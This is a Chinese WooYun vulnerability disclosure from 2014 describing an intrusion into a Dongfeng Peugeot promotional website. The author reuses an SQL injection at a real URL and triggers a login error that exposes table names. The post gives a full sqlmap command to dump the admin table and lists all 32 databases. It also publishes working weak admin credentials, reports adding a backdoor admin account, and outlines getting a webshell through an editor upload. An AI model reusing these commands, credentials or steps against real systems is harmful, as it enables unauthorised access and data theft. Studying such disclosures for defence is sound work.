当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-070189

漏洞标题:东风标致某业务后台盲注及弱口令导致后台沦陷可getshell

相关厂商:东风标志

漏洞作者: Ev1l

提交时间:2014-07-30 16:45

修复时间:2014-09-13 16:46

公开时间:2014-09-13 16:46

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-07-30: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-09-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

看到有一个标志的sql前台注入了,我就继续研究了一下我来发个后台,来看看吧,希望不要忽略,我的全胜纪录怎么能到此为止……

详细说明:

#01 注入
还是原洞主的注入点可以用

http://408.peugeot.com.cn/show.php?cid=57


注入点可以直接用,但如果提交这个不就重复了吗?我们要的是别的思路
#02盲注
我们登录后台(怎么找到的?当然是猜的)
看到一个比较格录的……(今天看pkav的教程时候想到了后台注入)

01.png


然后试一下 admin' admin 结果就报错了……很遗憾没有物理路径,要不然配合原洞主的注入就可以sqlmap写shell了。

02.png


后台注入到此为止吧……我也不太擅长手工,但是从这里我们发现了一些信息

Database error: Invalid SQL: SELECT id FROM `p_admin` WHERE username = 'admin'' AND password = 'admin' AND stat = 1 
MySQL Error: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'admin' AND stat = 1' at line 1)
Session halted.


数据库类型mysql
密码表名 p_admin
用户名字段:username
密码字段:password
物理路径还是无法获得。
#03 脱裤
sqlmap不解释……估计前洞主没有列数据库,要不然会发现整个主站都是在同一个mysql里
一共32个库,可以脱裤

available databases [32]:
[*] 2014happy
[*] 24hours
[*] 3015db
[*] 308
[*] 308powertogo
[*] 50db
[*] biaozhidashisai
[*] happy3008
[*] hei3008
[*] hobby
[*] information_schema
[*] lemans
[*] mysql
[*] performance_schema
[*] peugeot301
[*] peugeot408
[*] peugeot_2008_m
[*] peugeot_3008
[*] peugeot_3008_1year
[*] peugeot_3008_1year_m
[*] peugeot_3008_3D
[*] peugeot_3008_happy
[*] peugeot_408_jy
[*] peugeot_408im
[*] peugeot_club_35group_2
[*] peugeot_cn
[*] puzzlegame
[*] rcz
[*] sport
[*] team
[*] test
[*] zhengyan


我们根据经验判断是peugeot408这个表,然后表段和字段我们在第二部里都知道了,就直接构造语句

# Sqlmap -u http://408.peugeot.com.cn/show.php?cid=57 -D peogeot40
8 -T p_admin -C username,password --dump


我们发现竟然是弱口令……
admin 408408
test test
继续成功登陆后台

03.png


#04 猜想
后台存在kindeditor编辑器,可直接上传,审查元素获得webshell

漏洞证明:

后台管理加了一个wooyun wooyun

修复方案:

多检测一下吧,漏洞挺多的 没猜错还有xss

版权声明:转载请注明来源 Ev1l@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝